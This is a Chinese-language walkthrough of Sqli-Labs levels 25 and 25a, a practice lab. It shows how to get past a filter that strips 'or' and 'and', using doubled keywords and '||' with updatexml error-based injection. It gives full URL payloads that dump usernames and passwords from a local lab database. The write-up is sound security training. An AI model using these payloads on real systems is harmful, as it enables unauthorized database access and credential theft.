Sqli-Labs less25-25a

less-25

前置基础知识：后面的关卡涉及到WAF绕过：

主要有三种方式：白盒绕过、黑盒绕过、fuzz测试

网上sql注入WAF绕过的教程有很多，可以自己查询，总之就是比谁思路猥琐

根据第25关下面的提示和代码，我们发现他对or和and（不区分大小写）转义成了空格

第一种办法：

采用双写的方式

这里就直接最后一步了，几个步骤都相同：http://192.168.5.100/sqli-labs/Less-25/?id=0' union select 1,2,group_concat(concat_ws('-',username,passwoorrd)) from security.users --+（注意password中or双写）

第二种方法：or->|| 基于报错的注入

http://192.168.5.100/sqli-labs/Less-25/?id=0' || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+

遍历爆出所有的数据，继续使用即可，这里不可以使用group_concat()，因为数据显示不完整

less-25a

通过观察，上一关有’‘包裹，这一关没有任何包裹，并且也是转义or和and

：http://192.168.5.100/sqli-labs/Less-25a/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+